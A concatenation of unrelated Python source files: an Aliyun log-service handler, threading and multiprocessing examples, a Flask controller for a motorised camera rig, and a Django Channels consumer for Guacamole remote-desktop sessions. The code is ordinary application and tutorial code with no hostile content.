contents.append(("{0}{1}{2}".format(self.buildin_fields_prefix, k, self.buildin_fields_suffix), v))
def make_log_item(self, record):
contents = []
message_field_name = "{0}message{1}".format(self.buildin_fields_prefix, self.buildin_fields_suffix)
if isinstance(record.msg, dict) and self.extract_json:
data = self.extract_dict(record.msg)
contents.extend(data)
if not self.extract_json_drop_message or not data:
contents.append((message_field_name, self.format(record)))
elif isinstance(record.msg, (six.text_type, six.binary_type)) and self.extract_kv:
data = self.extract_kv_str(record.msg)
contents.extend(data)
if not self.extract_kv_drop_message or not data: # if it's not KV
contents.append((message_field_name, self.format(record)))
else:
contents = [(message_field_name, self.format(record))]
# add builtin fields
for x in self.fields:
k = x
if isinstance(x, LogFields):
k = x.name
x = x.value
elif isinstance(x, (six.binary_type, six.text_type)):
if x in BLACK_FIELD_LIST:
continue # by pass for those reserved fields. make no sense to render them
if x in BUILTIN_LOG_FIELDS_NAMES:
k = LogFields[x].name
x = LogFields[x].value
elif self.extra: # will handle it later
continue
self._add_record_fields(record, x, contents)
# handle extra
if self.extra:
for x in dir(record):
if not x.startswith('__') and not x in BUILTIN_LOG_FIELDS_NAMES:
self._add_record_fields(record, x, contents)
return LogItem(contents=contents, timestamp=record.created)
def emit(self, record):
try:
item = self.make_log_item(record)
req = PutLogsRequest(self.project, self.log_store, self.topic, logitems=[item, ])
self.send(req)
except Exception as e:
self.handleError(record)
class QueuedLogHandler(SimpleLogHandler):
"""
Queued Log Handler, tuned async log handler.
:param end_point: log service endpoint
:param access_key_id: access key id
:param access_key: access key
:param project: project name
:param log_store: logstore name
:param topic: topic, default is empty
:param fields: list of LogFields, default is LogFields.record_name, LogFields.level, LogFields.func_name, LogFields.module, LogFields.file_path, LogFields.line_no, LogFields.process_id, LogFields.process_name, LogFields.thread_id, LogFields.thread_name
:param queue_size: queue size, default is 40960 logs, about 10MB ~ 40MB
:param put_wait: maximum delay to send the logs, by default 2 seconds and wait double time for when Queue is full.
:param close_wait: when program exit, it will try to send all logs in queue in this timeperiod, by default 5 seconds
:param batch_size: merge this cound of logs and send them batch, by default min(1024, queue_size)
:param buildin_fields_prefix: prefix of builtin fields, default is empty. suggest using "__" when extract json is True to prevent conflict.
:param buildin_fields_suffix: suffix of builtin fields, default is empty. suggest using "__" when extract json is True to prevent conflict.
:param extract_json: if extract json automatically, default is False
:param extract_json_drop_message: if drop message fields if it's JSON and extract_json is True, default is False
:param extract_json_prefix: prefix of fields extracted from json when extract_json is True. default is ""
:param extract_json_suffix: suffix of fields extracted from json when extract_json is True. default is empty
:param extract_kv: if extract kv like k1=v1 k2="v 2" automatically, default is False
:param extract_kv_drop_message: if drop message fields if it's kv and extract_kv is True, default is False
:param extract_kv_prefix: prefix of fields extracted from KV when extract_json is True. default is ""
:param extract_kv_suffix: suffix of fields extracted from KV when extract_json is True. default is ""
:param extract_kv_sep: separator for KV case, defualt is '=', e.g. k1=v1
:param extra: if show extra info, default True to show all. default is True
:param kwargs: other parameters passed to logging.Handler
"""
def __init__(self, end_point, access_key_id, access_key, project, log_store, topic=None, fields=None,
queue_size=None, put_wait=None, close_wait=None, batch_size=None,
buildin_fields_prefix=None, buildin_fields_suffix=None,
extract_json=None, extract_json_drop_message=None,
extract_json_prefix=None, extract_json_suffix=None,
extract_kv=None, extract_kv_drop_message=None,
extract_kv_prefix=None, extract_kv_suffix=None,
extract_kv_sep=None,
extra=None,
**kwargs):
super(QueuedLogHandler, self).__init__(end_point, access_key_id, access_key, project, log_store,
topic=topic, fields=fields,
extract_json=extract_json,
extract_json_drop_message=extract_json_drop_message,
extract_json_prefix=extract_json_prefix,
extract_json_suffix=extract_json_suffix,
buildin_fields_prefix=buildin_fields_prefix,
buildin_fields_suffix=buildin_fields_suffix,
extract_kv=extract_kv,
extract_kv_drop_message=extract_kv_drop_message,
extract_kv_prefix=extract_kv_prefix,
extract_kv_suffix=extract_kv_suffix,
extract_kv_sep=extract_kv_sep,
extra=extra,
**kwargs)
self.stop_flag = False
self.stop_time = None
self.put_wait = put_wait or 2 # default is 2 seconds
self.close_wait = close_wait or 5 # default is 5 seconds
self.queue_size = queue_size or 40960 # default is 40960, about 10MB ~ 40MB
self.batch_size = min(batch_size or 1024, self.queue_size) # default is 1024 items
self.init_worker()
def init_worker(self):
self.worker = Thread(target=self._post)
self.queue = Queue(self.queue_size)
self.worker.setDaemon(True)
self.worker.start()
atexit.register(self.stop)
def flush(self):
self.stop()
def stop(self):
self.stop_time = time()
self.stop_flag = True
self.worker.join(timeout=self.close_wait + 1)
def emit(self, record):
log_item = self.make_log_item(record)
try:
self.queue.put(log_item, timeout=self.put_wait*2)
except Full as ex:
self.handleError(record)
def _get_batch_log_items(self, timeout=None):
"""try to get log items as fast as possible, once empty and stop flag or time-out, just return Empty"""
log_items = []
start_time = time()
while len(log_items) < self.batch_size and (time() - start_time) < timeout:
try:
log_item = self.queue.get(block=True, timeout=0.1)
log_items.append(log_item)
except Empty:
if self.stop_flag:
break
return log_items
def _post(self):
while not self.stop_flag or (time() - self.stop_time) <= self.close_wait:
items = self._get_batch_log_items(self.put_wait)
if not items:
continue
try:
req = PutLogsRequest(self.project, self.log_store, self.topic, logitems=items)
self.send(req)
except Exception as ex:
sys.stderr.write('--- Aliyun %s Worker Send Log Failed, Log Item Count: %s ---\n' % (self, len(items)))
traceback.print_exc(limit=None, file=sys.stderr)
class UwsgiQueuedLogHandler(QueuedLogHandler):
"""
Queued Log Handler for Uwsgi, depends on library `uwsgidecorators`, need to deploy it separatedly.
:param end_point: log service endpoint
:param access_key_id: access key id
:param access_key: access key
:param project: project name
:param log_store: logstore name
:param topic: topic, default is empty
:param fields: list of LogFields, default is LogFields.record_name, LogFields.level, LogFields.func_name, LogFields.module, LogFields.file_path, LogFields.line_no, LogFields.process_id, LogFields.process_name, LogFields.thread_id, LogFields.thread_name
:param queue_size: queue size, default is 40960 logs, about 10MB ~ 40MB
:param put_wait: maximum delay to send the logs, by default 2 seconds and wait double time for when Queue is full.
:param close_wait: when program exit, it will try to send all logs in queue in this timeperiod, by default 2 seconds
:param batch_size: merge this cound of logs and send them batch, by default min(1024, queue_size)
:param buildin_fields_prefix: prefix of builtin fields, default is empty. suggest using "__" when extract json is True to prevent conflict.
:param buildin_fields_suffix: suffix of builtin fields, default is empty. suggest using "__" when extract json is True to prevent conflict.
:param extract_json: if extract json automatically, default is False
:param extract_json_drop_message: if drop message fields if it's JSON and extract_json is True, default is False
:param extract_json_prefix: prefix of fields extracted from json when extract_json is True. default is ""
:param extract_json_suffix: suffix of fields extracted from json when extract_json is True. default is empty
:param extract_kv: if extract kv like k1=v1 k2="v 2" automatically, default is False
:param extract_kv_drop_message: if drop message fields if it's kv and extract_kv is True, default is False
:param extract_kv_prefix: prefix of fields extracted from KV when extract_json is True. default is ""
:param extract_kv_suffix: suffix of fields extracted from KV when extract_json is True. default is ""
:param extract_kv_sep: separator for KV case, defualt is '=', e.g. k1=v1
:param extra: if show extra info, default True to show all. default is True
:param kwargs: other parameters passed to logging.Handler
"""
def __init__(self, *args, **kwargs):
# change close_wait from default 5 to 2
if len(args) >= 10:
if args[9] is None:
args = args[:9] + (2,) + args[10:]
elif 'close_wait' in kwargs and kwargs['close_wait'] is None:
kwargs['close_wait'] = 2
super(UwsgiQueuedLogHandler, self).__init__(*args, **kwargs)
def init_worker(self):
self.queue = Queue(self.queue_size)
from uwsgidecorators import postfork, thread
self._post = postfork(thread(self._post))
def stop(self):
self.stop_time = time()
self.stop_flag = True
|
CAPSTONEPT2edit.py
|
import hashlib
import time
import os
import multiprocessing as mp
import concurrent.futures
from threading import Thread
hashvalues = []
threads = []
processes = []
cpus = os.cpu_count()
textfile = "sampleData.txt"
currentDir = os.getcwd()
text_file = open(os.path.join(currentDir, textfile), 'r')
text = text_file.readlines() * 10
chunks = [text[x:x+cpus] for x in range(0, len(text), cpus)]
max = len(chunks)
text_file.close()
def encrypt(data):
for line in data:
hashvalues.append(hashlib.sha256(line.encode()))
def encrypt_parallel(data):
for chunk in data:
for line in chunk:
hashvalues.append(hashlib.sha256(line.encode()))
def showValues():
for hash in hashvalues:
print(hash.digest())
if __name__ == "__main__":
#xxxxxxxxSERIALxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
'''
startTime = time.time()
encrypt(text)
stopTime = time.time()
serialTime = stopTime - startTime
#showValues()
hashvalues = []
#xxxxxxxxMULTITHREADING USING THREAD POOLxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
startTime = time.time()
with concurrent.futures.ThreadPoolExecutor(max_workers=cpus) as \
executor:
for chunk in chunks:
executor.submit(encrypt, chunk)
stopTime = time.time()
mt_time = stopTime - startTime
showValues()
hashvalues = []
'''
#xxxxxxxxMULTITHREADING USING THREAD OBJECTxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
startTime = time.time()
i = 0
for thread in range(cpus):
thread = Thread(target=encrypt_parallel, args=[chunks[int(i*max/cpus):(int((i+ 1)*max/cpus)) ],])
thread.start()
threads.append(thread)
i += 1
for thread in threads:
thread.join()
stopTime = time.time()
thread_time = stopTime - startTime
showValues()
'''
print(f'Serial time to encode: {(serialTime)}')
print(f'Multithreading(thread-pool) time to encode: {(mt_time)}')
'''
print(f'Multithreading(using thread objects) time to encode: {(thread_time)}')
|
game_loop_process.py
|
import asyncio
from aiohttp import web
from concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor
from multiprocessing import Queue, Process
import os
from time import sleep
async def handle(request):
index = open("index.html", 'rb')
content = index.read()
return web.Response(body=content, content_type='text/html')
tick = asyncio.Condition()
async def wshandler(request):
ws = web.WebSocketResponse()
await ws.prepare(request)
recv_task = None
tick_task = None
while 1:
if not recv_task:
recv_task = asyncio.ensure_future(ws.receive())
if not tick_task:
await tick.acquire()
tick_task = asyncio.ensure_future(tick.wait())
done, pending = await asyncio.wait(
[recv_task,
tick_task],
return_when=asyncio.FIRST_COMPLETED)
if recv_task in done:
msg = recv_task.result()
if msg.tp == web.MsgType.text:
print("Got message %s" % msg.data)
ws.send_str("Pressed key code: {}".format(msg.data))
elif msg.tp == web.MsgType.close or\
msg.tp == web.MsgType.error:
break
recv_task = None
if tick_task in done:
ws.send_str("game loop ticks")
tick.release()
tick_task = None
return ws
def game_loop(asyncio_loop):
# coroutine to run in main thread
async def notify():
await tick.acquire()
tick.notify_all()
tick.release()
queue = Queue()
# function to run in a different process
def worker():
while 1:
print("doing heavy calculation in process {}".format(os.getpid()))
sleep(1)
queue.put("calculation result")
Process(target=worker).start()
while 1:
# blocks this thread but not main thread with event loop
result = queue.get()
print("getting {} in process {}".format(result, os.getpid()))
task = asyncio.run_coroutine_threadsafe(notify(), asyncio_loop)
task.result()
asyncio_loop = asyncio.get_event_loop()
executor = ThreadPoolExecutor(max_workers=1)
asyncio_loop.run_in_executor(executor, game_loop, asyncio_loop)
app = web.Application()
app.router.add_route('GET', '/connect', wshandler)
app.router.add_route('GET', '/', handle)
web.run_app(app)
|
threadtest.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""" a test module """
__author__ = 'zmy'
import time, threading
# 新线程执行的代码:
def loop():
print('thread %s is running...' % threading.current_thread().name)
n = 0
while n < 5:
n = n + 1
print('thread %s >>> %s' % (threading.current_thread().name, n))
time.sleep(1)
print('thread %s ended.' % threading.current_thread().name)
print('thread %s is running...' % threading.current_thread().name)
t = threading.Thread(target=loop, name='LoopThread')
t.start()
t.join()
print('thread %s ended.' % threading.current_thread().name)
# 假定这是你的银行存款:
balance = 0
lock = threading.Lock()
def change_it(n):
# 先存后取,结果应该为0:
global balance
balance = balance + n
balance = balance - n
def run_thread(n):
# for i in range(100000):
# change_it(n)
for i in range(100000):
# 先要获取锁:
lock.acquire()
try:
# 放心地改吧:
change_it(n)
finally:
# 改完了一定要释放锁:
lock.release()
t1 = threading.Thread(target=run_thread, args=(5,))
t2 = threading.Thread(target=run_thread, args=(8,))
t1.start()
t2.start()
t1.join()
t2.join()
print(balance)
|
main.py
|
print('Import io')
import io
print('Import os')
import os
print('Import base64')
import base64
print('Import cv2')
import cv2
print('Import json')
import json
print('Import time')
import time
print('Import queue')
import queue
print('Import threading')
import threading
print('Import flask')
from flask import Flask, send_from_directory, request, Response
print('Import flask_sock')
from flask_sock import Sock
print('Import Simple PID')
from simple_pid import PID
print('Import StreamCamera')
from camera import StreamCamera
print('Import EmotimoSerial')
from emotimo_serial import EmotimoSerial
print('Import adb module')
from adb_android import ADBControl
print('Import Serial')
import serial.tools.list_ports as list_ports
# Get Camera Ready
streamingQ = queue.Queue()
controlQ = queue.Queue()
sc = StreamCamera(
{"framerate": 10},
streamingQ,
controlQ
)
sc.initialize_camera()
sc.start_capture()
streaming = True
# Android Debug Bridge Setup
adb = ADBControl({})
# Get Emotimo Ready
em = EmotimoSerial()
em_ready = False
em_status = {
"pan": 0,
"tilt": 0,
"slide": 0
}
# Camera Movement Control
pan_limits = (
-50000,
50000
)
tilt_limits = (
-20000,
30000
)
pid_x = PID(
20,
0,
0,
0
)
pid_y = PID(
20,
0,
0,
0
)
enable_pts_move = False
control_loop_enabled = True
camera_shooting = False
pts_interval = 1
def emotimo_open_serial():
print("Opening Em Connection")
em.open_connection()
def emotimo_close_serial():
print("Closing Em Connection")
em.close_connection()
def emotimo_ready_serial():
global em_ready
print("Setting Pulse Rate")
em.set_pulse_rate(1, 20000)
em.set_pulse_rate(2, 20000)
em.set_pulse_rate(3, 20000)
print("Zeroing all Motors")
em.zero_all_motors()
em_ready = True
print("Em Now Ready")
def emotimo_move_all(pan, tilt, slide, ignore_slide=True):
global em_ready
global em_status
if not em_ready:
print("Em Unavailable")
return
em_ready = False
print('Set Pan: %s' % str(pan))
print('Set Tilt: %s' % str(tilt))
print('Set Slide: %s' % str(slide))
# Enforce Limits
if pan < 0:
pan = max(pan, pan_limits[0])
if pan > 0:
pan = min(pan, pan_limits[1])
if tilt < 0:
tilt = max(tilt, tilt_limits[0])
if tilt > 0:
tilt = min(tilt, tilt_limits[1])
em.set_all(
{
"pan": pan,
"tilt": tilt,
"slide": slide
},
ignore_slide
)
em_status["pan"] = pan
em_status["tilt"] = tilt
em_status["slide"] = slide
em_ready = True
def emotimo_move(pts, direction, pan_increment=1000, tilt_increment=1000, slide_increment=10000):
global em_ready
global em_status
if not em_ready:
print("Em Unavailable")
return
em_ready = False
if pts == 'tilt' and direction == 'up':
cur_value = em_status['tilt']
cur_value += tilt_increment
print('Set Tilt: %s' % str(cur_value))
em.set_tilt(cur_value)
em_status['tilt'] = cur_value
em_ready = True
if pts == 'tilt' and direction == 'down':
cur_value = em_status['tilt']
cur_value -= tilt_increment
print('Set Tilt: %s' % str(cur_value))
em.set_tilt(cur_value)
em_status['tilt'] = cur_value
em_ready = True
if pts == 'pan' and direction == 'left':
cur_value = em_status['pan']
cur_value -= pan_increment
print('Set Pan: %s' % str(cur_value))
em.set_pan(cur_value)
em_status['pan'] = cur_value
em_ready = True
if pts == 'pan' and direction == 'right':
cur_value = em_status['pan']
cur_value += pan_increment
print('Set Pan: %s' % str(cur_value))
em.set_pan(cur_value)
em_status['pan'] = cur_value
em_ready = True
if pts == 'slide' and direction == 'left':
cur_value = em_status['slide']
cur_value -= slide_increment
print('Set Slide: %s' % str(cur_value))
em.set_slide(cur_value)
em_status['slide'] = cur_value
em_ready = True
if pts == 'slide' and direction == 'right':
cur_value = em_status['slide']
cur_value += slide_increment
print('Set Slide: %s' % str(cur_value))
em.set_slide(cur_value)
em_status['slide'] = cur_value
em_ready = True
if pts == 'all' and direction == 'origin':
print('Set Pan: 0')
print('Set Tilt: 0')
print('Ignoring Slide')
em.set_all({
"pan": 0,
"tilt": 0
}, ignore_slide=True)
em_status['pan'] = 0
em_status['tilt'] = 0
em_ready = True
if pts == 'all' and direction == 'reset':
print('Changing Pan: 0')
print('Changing Tilt: 0')
em.zero_all_motors()
em_status['pan'] = 0
em_status['tilt'] = 0
em_ready = True
def process_diff(dx, dy):
print('')
print('DX: ', dx)
print('DY: ', dy)
dt = time.time()
# delta_pan = dx
delta_pan = -1 * pid_x(dx)
pan = int(em_status['pan']) + int(delta_pan)
# delta_tilt = dy
delta_tilt = -1 * pid_y(dy)
tilt = int(em_status['tilt']) + int(delta_tilt)
print('Delta Pan: ', delta_pan)
print('Delta Tilt: ', delta_tilt)
# Enforce Limits
if pan < 0:
pan = max(pan, pan_limits[0])
if pan > 0:
pan = min(pan, pan_limits[1])
if tilt < 0:
tilt = max(tilt, tilt_limits[0])
if tilt > 0:
tilt = min(tilt, tilt_limits[1])
print("Pan: ", pan)
print("Tilt: ", tilt)
emotimo_move_all(pan, tilt, 0)
def control_loop(controlQ, pixel_deadzone=0):
global control_loop_enabled
pts_last_time = 0
while control_loop_enabled:
dt = time.time()
reset_dt = False
if camera_shooting:
if pts_last_time + pts_interval < dt:
reset_dt = True
camera_take_shot()
if enable_pts_move:
while not controlQ.empty():
dx, dy = controlQ.get()
if abs(dx) < pixel_deadzone:
dx = 0
if abs(dy) < pixel_deadzone:
dy = 0
if pts_last_time + pts_interval < dt:
process_diff(dx, dy)
reset_dt = True
if reset_dt:
pts_last_time = dt
def camera_take_shot():
adb.take_photo()
def receive_serial(data):
action = data.get('action')
if action == 'open':
emotimo_open_serial()
if action == 'ready':
emotimo_ready_serial()
if action == 'close':
emotimo_close_serial()
def receive_pts(data):
global enable_pts_move
action = data.get('action')
if action == 'move':
detail = data.get('detail', {})
pts = detail.get('pts')
direction = detail.get('direction')
emotimo_move(pts, direction)
if action == 'reset-origin':
detail = data.get('detail', {})
pts = detail.get('pts')
emotimo_move(pts, 'reset')
if action == 'move-all':
pan = data.get('detail', {}).get('pan', 0)
tilt = data.get('detail', {}).get('tilt', 0)
slide = data.get('detail', {}).get('slide', 0)
emotimo_move_all(int(pan), int(tilt), slide)
if action == 'follow':
if data.get('detail') == 'enable':
enable_pts_move = True
if data.get('detail') == 'disable':
enable_pts_move = False
def receive_obj_tracking(data):
action = data.get('action')
if action:
sc.start_following()
else:
sc.stop_following()
def receive_click(data):
action = data.get('action')
if action == 'pos-update':
x = data.get('position', {}).get('x', 0)
y = data.get('position', {}).get('y', 0)
sc.set_point(x, y)
def receive_camera(data):
global pts_interval
global camera_shooting
action = data.get('action')
print(action)
if action == 'take-shot':
camera_take_shot()
if action == 'start-interval':
camera_shooting = True
if action == 'stop-interval':
camera_shooting = False
if action == 'set-interval':
pts_interval = float(data.get('detail', {}).get('interval', 2))
if action == 'modify-interval':
print('Too Hard for the moment')
if __name__ == '__main__':
# Initialize Flask
app = Flask(__name__, static_folder="./html")
# Add WebSockets
sock = Sock(app)
@sock.route('/control')
def control(ws):
socket_open = True
while socket_open:
resp_data = ws.receive()
if resp_data == 'finish':
socket_open = False
continue
data = json.loads(resp_data)
module = data.get('module', '')
if module == 'serial':
receive_serial(data)
if module == 'pts-move':
receive_pts(data)
if module == 'obj-track':
receive_obj_tracking(data)
if module == 'click-position':
receive_click(data)
if module == 'camera':
receive_camera(data)
@sock.route('/live')
def live(ws):
resp = ws.receive()
if resp == 'begin':
stream = True
else:
stream = False
while stream:
resp = ws.receive()
if resp == 'finish':
stream = False
continue
while not streamingQ.empty():
image = streamingQ.get()
_, buffer = cv2.imencode('.jpg', image)
frame = buffer.tobytes()
send_data = base64.b64encode(frame).decode()
ws.send(send_data)
ws.close(1000, 'Closing WS Connection')
@app.route('/camera-follow')
def camera_follow():
return send_from_directory(app.static_folder, 'index.html')
@app.route('/favicon.ico')
def favicon():
return send_from_directory(app.static_folder, 'favico.ico')
@app.route('/camera-follow.js')
def mouse_click():
return send_from_directory(app.static_folder, 'camera-follow.js')
# PTS and Photo Taking Control Thread
control_thread = threading.Thread(target=control_loop, args=(controlQ,))
control_thread.start()
try:
app.run('0.0.0.0', port=8000)
finally:
control_loop_enabled = False
control_thread.join()
streaming = False
sc.stop_capture()
em.close_connection()
time.sleep(2)
|
websocket_layer.py
|
import threading
from channels.generic.websocket import WebsocketConsumer
from django.conf import settings
from server.models import RemoteUserBindHost
from webssh.models import TerminalSession
import django.utils.timezone as timezone
from django.db.models import Q
from asgiref.sync import async_to_sync
from util.tool import gen_rand_char, terminal_log, res
from util.crypto import decrypt
import time
from .guacamoleclient import Client, ClientView
import re
import base64
from django.http.request import QueryDict
import os
import shutil
import logging
logging.basicConfig(level=logging.INFO, format='[%(asctime)s] - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
try:
terminal_exipry_time = settings.CUSTOM_TERMINAL_EXIPRY_TIME
except Exception:
terminal_exipry_time = 60 * 30
class WebGuacamole(WebsocketConsumer):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
query_string = self.scope.get('query_string').decode()
guacamole_args = QueryDict(query_string=query_string, encoding='utf-8')
self.hostid = int(guacamole_args.get('hostid'))
self.remote_host = None
self.width = guacamole_args.get('width')
self.height = guacamole_args.get('height')
self.dpi = guacamole_args.get('dpi')
self.session = None
self.start_time = timezone.now()
self.send_flag = 0 # 0 发送自身通道,1 发送 group 通道,作用为当管理员查看会话时,进入 group 通道
self.group = 'session_' + gen_rand_char()
self.guacamoleclient = None
self.lock = False
self.last_operation_time = time.time()
self.closed = False
self.client = None
self.user_agent = None
def connect(self):
self.accept('guacamole')
async_to_sync(self.channel_layer.group_add)(self.group, self.channel_name) # 加入组
self.session = self.scope.get('session', None)
if not self.session.get('islogin', None): # 未登录直接断开 websocket 连接
self.close(3001)
if 'webguacamole终端' not in self.session[settings.INIT_PERMISSION]['titles']: # 判断权限
self.close(3001)
if not self.session['issuperuser']:
hosts = RemoteUserBindHost.objects.filter(
Q(id=self.hostid),
Q(enabled=True),
Q(user__username=self.session['username']) | Q(group__user__username=self.session['username']),
).distinct()
else:
hosts = RemoteUserBindHost.objects.filter(
Q(id=self.hostid),
Q(enabled=True),
).distinct()
if not hosts:
self.close(3001)
self.remote_host = RemoteUserBindHost.objects.get(id=self.hostid)
_type = 7
if self.remote_host.get_protocol_display() == 'vnc': # vnc 登陆不需要账号
_type = 8
# guacamole 连接性能参数设置
# enable_wallpaper 如果设置为true,则开启桌面壁纸渲染。默认为不开启
# enable_theming 如果设置为true,则开启窗口和控件的主题。默认为不开启
# enable_font_smoothing 如果设置为“true”,文本将以平滑的边缘呈现。默认情况下,RDP上的文本粗体呈现,因为这减少了文本使用的颜色数量,从而减少了连接所需的带宽。
# enable_full_window_drag 如果设置为“true”,窗口的内容将随着窗口的移动而显示。默认情况下,RDP服务器将仅在窗口拖动时绘制窗口边框。
# enable_desktop_composition 如果设置为“true”,则允许使用透明窗口和阴影等图形效果。默认情况下,此类效果(如果可用)被禁用。
# enable_menu_animations 如果设置为“true”,菜单开启和关闭动画将被允许。默认情况下禁用菜单动画。
self.guacamoleclient = Client(websocker=self)
if 'webguacamole终端文件上传下载' not in self.session[settings.INIT_PERMISSION]['titles']: # 判断权限
kwargs = {
'protocol': self.remote_host.get_protocol_display(),
'hostname': self.remote_host.ip,
'port': self.remote_host.port,
'username': self.remote_host.remote_user.username,
'password': decrypt(self.remote_host.remote_user.password),
'width': self.width,
'height': self.height,
'dpi': self.dpi,
'enable_font_smoothing': "true",
}
if self.remote_host.remote_user.domain:
kwargs['domain'] = self.remote_host.remote_user.domain
if self.remote_host.security:
kwargs['security'] = self.remote_host.security
self.guacamoleclient.connect(**kwargs)
else:
kwargs = {
'protocol': self.remote_host.get_protocol_display(),
'hostname': self.remote_host.ip,
'port': self.remote_host.port,
'username': self.remote_host.remote_user.username,
'password': decrypt(self.remote_host.remote_user.password),
'width': self.width,
'height': self.height,
'dpi': self.dpi,
'enable_font_smoothing': "true",
'enable_drive': "true",
'drive_name': "filesystem",
'drive_path': "/fs/{}".format(self.group),
'create_drive_path': "true",
}
if self.remote_host.remote_user.domain:
kwargs['domain'] = self.remote_host.remote_user.domain
if self.remote_host.security:
kwargs['security'] = self.remote_host.security
self.guacamoleclient.connect(**kwargs)
for i in self.scope['headers']:
if i[0].decode('utf-8') == 'user-agent':
self.user_agent = i[1].decode('utf-8')
break
for i in self.scope['headers']:
if i[0].decode('utf-8') == 'x-real-ip':
self.client = i[1].decode('utf-8')
break
if i[0].decode('utf-8') == 'x-forwarded-for':
self.client = i[1].decode('utf-8').split(',')[0]
break
self.client = self.scope['client'][0]
data = {
'name': self.channel_name,
'group': self.group,
'user': self.session.get('username'),
'host': self.remote_host.ip,
'username': self.remote_host.remote_user.username,
'protocol': self.remote_host.protocol,
'port': self.remote_host.port,
'type': _type, # 7 webrdp 8 webvnc
'address': self.client,
'useragent': self.user_agent,
'connect_info': '{0}_{1}_{2}_{3}'.format(self.width, self.height, self.dpi, self.guacamoleclient.guacamoleclient.id)
}
TerminalSession.objects.create(**data)
t = threading.Thread(target=self.check_timeout)
t.daemon = True
t.start()
# 给客户端发送组信息,用于web页面上传文件,需要在 guacamole/js/all.js 中自定义 group 的处理处理方法
self.send('5.group,10.group_name,{0}.{1};'.format(len(self.group), self.group))
def disconnect(self, close_code):
time.sleep(0.5)
if not self.closed:
self.closed = True
if 'webguacamole终端文件上传下载' in self.session[settings.INIT_PERMISSION]['titles']:
try:
upload_file_path = os.path.join(settings.GUACD_ROOT, self.group)
shutil.rmtree(upload_file_path, ignore_errors=True)
except Exception:
pass
try:
async_to_sync(self.channel_layer.group_send)(self.group, { # 关闭 viewer
"type": "close.viewer",
"text": "",
})
async_to_sync(self.channel_layer.group_discard)(self.group, self.channel_name)
if close_code != 3001:
self.guacamoleclient.close()
except Exception:
pass
finally:
if self.guacamoleclient.res:
try:
tmp = list(self.guacamoleclient.res)
self.guacamoleclient.res = []
res(self.guacamoleclient.res_file, tmp, False)
except Exception:
pass
try:
terminal_log(
self.session.get('username'),
self.remote_host.hostname,
self.remote_host.ip,
self.remote_host.get_protocol_display(),
self.remote_host.port,
self.remote_host.remote_user.username,
self.guacamoleclient.file_cmd,
self.guacamoleclient.res_file,
self.client,
self.user_agent,
self.start_time,
)
except Exception:
pass
TerminalSession.objects.filter(name=self.channel_name, group=self.group).delete()
def receive(self, text_data=None, bytes_data=None):
if not self.lock:
self.guacamoleclient.shell(text_data)
if not text_data.startswith('4.sync') and not text_data.startswith('3.nop'):
self.last_operation_time = time.time()
else:
if text_data.startswith('4.sync') or text_data.startswith('3.nop'):
self.guacamoleclient.shell(text_data)
else:
if re.match(r'^5\.mouse,.*1\.1;$', text_data) or re.match(r'^3\.key,.*1\.1;$', text_data):
message = str(base64.b64encode('当前会话已被管理员锁定'.encode('utf-8')), 'utf-8')
self.send('6.toastr,1.1,{0}.{1};'.format(len(message), message)) # 给客户端发送警告
# 会话外使用 channels.layers 设置 type 为 group.message 调用此函数
def group_message(self, data):
try:
self.send(data['text'])
except Exception:
pass
# 会话外使用 channels.layers 设置 type 为 close.message 调用此函数
def close_message(self, data):
try:
message = str(base64.b64encode('当前会话已被管理员关闭'.encode('utf-8')), 'utf-8')
# 给客户端发送toastr警告
# 需要在 guacamole/js/all.js 中自定义 toastr 的处理处理方法
self.send('6.toastr,1.2,{0}.{1};'.format(len(message), message))
self.close()
except Exception:
pass
def lock_message(self, data):
if not self.lock:
self.lock = True
message = str(base64.b64encode('当前会话已被管理员锁定'.encode('utf-8')), 'utf-8')
self.send('6.toastr,1.1,{0}.{1};'.format(len(message), message))
def unlock_message(self, data):
if self.lock:
self.lock = False
message = str(base64.b64encode('当前会话已被管理员解锁'.encode('utf-8')), 'utf-8')
self.send('6.toastr,1.0,{0}.{1};'.format(len(message), message))
def check_timeout(self, sleep_time=3):
while 1:
if self.closed:
break
if int(time.time() - self.last_operation_time) >= terminal_exipry_time:
try:
message = str(base64.b64encode('由于长时间没有操作或者没有数据返回,连接已断开!'.encode('utf-8')), 'utf-8')
self.send('6.toastr,1.2,{0}.{1};'.format(len(message), message))
self.close()
except Exception:
pass
break
time.sleep(sleep_time)
def upload_message(self, data):
cmd_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(int(time.time())))
filename = data['text']
self.guacamoleclient.file_cmd += cmd_time + "\t" + '上传文件 - {}'.format(filename) + '\n'
class WebGuacamole_view(WebsocketConsumer):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.session = None
def connect(self):
self.accept('guacamole')
self.session = self.scope.get('session', None)
if not self.session.get('islogin', None): # 未登录直接断开 websocket 连接
self.close()
if '终端会话查看' not in self.session[settings.INIT_PERMISSION]['titles']: # 判断权限
self.close()
query_string = self.scope.get('query_string').decode()
args = QueryDict(query_string=query_string, encoding='utf-8')
self.group = args.get('group')
terminalsession = object
try:
terminalsession = TerminalSession.objects.get(group=self.group)
except Exception:
self.close()
tmp = terminalsession.connect_info.split("_")
width = tmp[0]
height = tmp[1]
dpi = tmp[2]
protocol = tmp[3]
self.guacamoleclient = ClientView(websocker=self)
self.guacamoleclient.connect(
protocol=protocol,
hostname='',
port='',
username='',
password='',
width=width,
height=height,
dpi=dpi,
enable_font_smoothing="true",
)
# 发送分辨率信息到查看模式的客户端
self.send("7.display,{0}.{1},{2}.{3},{4}.{5};".format(len(width), width, len(height), height, len(dpi), dpi))
async_to_sync(self.channel_layer.group_add)(self.group, self.channel_name) # 加入组
def disconnect(self, close_code):
async_to_sync(self.channel_layer.group_discard)(self.group, self.channel_name)
self.guacamoleclient.close()
def receive(self, text_data=None, bytes_data=None):
if text_data.startswith('4.sync') or text_data.startswith('3.nop'):
self.guacamoleclient.shell(text_data)
def close_viewer(self, data):
message = str(base64.b64encode('会话已关闭'.encode('utf-8')), 'utf-8')
self.send('6.toastr,1.2,{0}.{1};'.format(len(message), message))
self.close()
def upload_message(self, data):
pass
|
fork_sample.py
|
import meinheld
from multiprocessing import Process
import signal
workers = []
def hello_world(environ, start_response):
status = '200 OK'
res = "Hello world!"
